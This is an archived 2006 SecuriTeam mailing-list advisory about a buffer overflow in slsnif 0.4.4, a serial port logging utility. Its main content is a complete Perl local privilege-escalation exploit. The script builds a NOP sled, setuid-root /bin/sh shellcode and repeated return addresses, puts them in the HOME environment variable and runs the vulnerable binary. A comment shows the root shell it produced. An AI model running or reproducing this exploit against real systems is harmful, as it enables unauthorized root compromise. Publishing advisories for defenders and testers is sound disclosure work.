[EXPL] Serial Line Sniffer Buffer Overflow (Exploit)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 15 Jan 2006 18:54:20 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Serial Line Sniffer Buffer Overflow (Exploit)
------------------------------------------------------------------------
SUMMARY
<http://freshmeat.net/projects/slsnif/> slsnif is "a serial port logging
utility. It listens to the specified serial port and logs all data going
through this port in both directions".
Serial Line Sniffer Buffer has been found to be vulnerable to buffer
overflow, the following exploit code can be used to test your system for
the mentioned vulnerability.
DETAILS
Vulnerable Systems:
* Serial Line Sniffer version 0.4.4
Exploit:
# Author: Sintigan@xxxxxxxxxxxxxxx
# http://www.shellcoders.com/
# ----------------------------------------
# Program ID: Serial Line Sniffer 0.4.4
#
# sintigan@midnight:/home/sintigan$ perl slsnif-ploit.pl
# sh-3.00# id
# uid=0(root) gid=100(users) groups=100(users)
# ---------------------------------------
#
# Greetz to Elohimus, Melkor, Modzilla, tgo, asTHma, and bk
# and whoever else i forgot
#
#!/usr/bin/perl
$shellcode = "\x31\xdb\x8d\x43\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73" .
"\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
$buf = 288;
$ret = 0xbffff3a0;
$nop = "\x90";
$offset = -250;
if (@ARGV == 1) { $offset = $ARGV[0]; }
for ($i = 0; $i < ($buf - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
$addr = pack('l', ($ret + $offset));
for ($i += length($shellcode); $i < $buf; $i += 4) {
$buffer .= $addr;
}
$ENV{'HOME'} = $buffer; exec("/usr/local/bin/slsnif");
ADDITIONAL INFORMATION
The information has been provided by <mailto:Sintigan@xxxxxxxxxxxxxxx>
Sintigan.
The original article can be found at:
<http://shellcoders.com/sintigan/slsnif-ploit.pl>
http://shellcoders.com/sintigan/slsnif-ploit.pl
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [EXPL] eStara Softphone Buffer Overflow (Exploit)
- Next by Date: [UNIX] Xmame Buffer Overflow
- Previous by thread: [EXPL] eStara Softphone Buffer Overflow (Exploit)
- Next by thread: [UNIX] Xmame Buffer Overflow
- Index(es):
Relevant Pages
- [NT] Borland Products idsql32.dll Buffer Overflow Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Borland Products idsql32.dll Buffer
Overflow Vulnerability ... processing SQL statements using the "DbiQExec" function.
... In no event shall we be liable for any damages whatsoever including direct, indirect,
incidental, consequential, loss of business profits or special damages. ... (Securiteam) - [UNIX] phpBB Modified By Przemo Arbitary Code Execution
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... A directory traversal vulnerability
and insecure file inclusion ... script that contains arbitrary code. ... In no event
shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential,
loss of business profits or special damages. ... (Securiteam) - [EXPL] phpStat Authentication Bypass Vulnerability (Exploit, Setup.PHP)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... phpStat is vulnerable to
an authentication bypass vulnerability, ... In no event shall we be liable for any damages
whatsoever including direct, indirect, incidental, consequential, loss of business profits or special
damages. ... (Securiteam) - [EXPL] Security vulnerability in SUNs Java Virtual Machine Implementation (Test)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Vulnerability in SUN's
Java Virtual Machine Implementation ('/' Replaces ... The following applet tests for this
vulnerability: ... In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam) - [UNIX] AspApp SQL Injection and Cross Site Scripting
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Vulnerabilities were discovered
in AspApp allowing malicious users to ... The following URLs can be used to trigger the
vulnerability: ... In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)